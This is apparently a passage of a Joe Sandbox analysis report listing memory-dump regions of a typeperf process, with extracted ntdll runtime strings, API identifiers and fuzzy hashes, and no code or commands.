                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033746FC
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03374742
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03374725
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03374655
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 03374787
                                                                                                                        • ExecuteOptions, xrefs: 033746A0
                                                                                                                        • Execute=1, xrefs: 03374713
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033702BD
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033702E7
                                                                                                                        • RTL: Re-Waiting, xrefs: 0337031E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03377B7F
                                                                                                                        • RTL: Resource at %p, xrefs: 03377B8E
                                                                                                                        • RTL: Re-Waiting, xrefs: 03377BAC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0337728C
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03377294
                                                                                                                        • RTL: Resource at %p, xrefs: 033772A3
                                                                                                                        • RTL: Re-Waiting, xrefs: 033772C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        • Opcode ID: a94f4b3a16c7c1ef27e52caeb745e20965f2ea7c33a393cbff8dadd4dfce49d7
                                                                                                                        • Instruction ID: b765b7ccd5febe9ba0311a31c5631ebc199173a5bc72318ddc9ea529dcaa98cd
                                                                                                                        • Opcode Fuzzy Hash: a94f4b3a16c7c1ef27e52caeb745e20965f2ea7c33a393cbff8dadd4dfce49d7
                                                                                                                        • Instruction Fuzzy Hash: DA41DF35B00306ABDB20DE25CCC1F6AB7A9FF85710F144A19F965EB640DB25E8528BD1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        • Opcode ID: ddbdaff9ab9197e7e31fd4a438dca01e351e0c88f77a02cbfe1505833d283f91
                                                                                                                        • Instruction ID: ad44e9248749a40c10dae986b7429cc28f02f6ee95ddc4130f94d678593e26f7
                                                                                                                        • Opcode Fuzzy Hash: ddbdaff9ab9197e7e31fd4a438dca01e351e0c88f77a02cbfe1505833d283f91
                                                                                                                        • Instruction Fuzzy Hash: 8F316476A102199FCB20DF29DC80BEFB7F8EB44610F444956E949E7640EB31AA458FB0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction ID: 9baf4870ef4e6ffcffc0eea840714bbab3d955e725a6773d2d871a75cf4a89c8
                                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction Fuzzy Hash: 0291A174E00316ABDB24DF69CCC0ABEB7E5EF45320F58461AE875AB2D0D734B9818750
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280
                                                                                                                        • Opcode ID: a8f9d143a75056395a6a87cd15d9d3ae4ee763eab2b03ec4aa618b497269d520
                                                                                                                        • Instruction ID: 61afa8907333d978073b104903f32b010dace7251fc1dcad58f6baf29363e58f
                                                                                                                        • Opcode Fuzzy Hash: a8f9d143a75056395a6a87cd15d9d3ae4ee763eab2b03ec4aa618b497269d520
                                                                                                                        • Instruction Fuzzy Hash: C7815975D012699FDB35DB54CC94BEEB7B8AF08710F0581EAA909B7290D7709E84CFA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%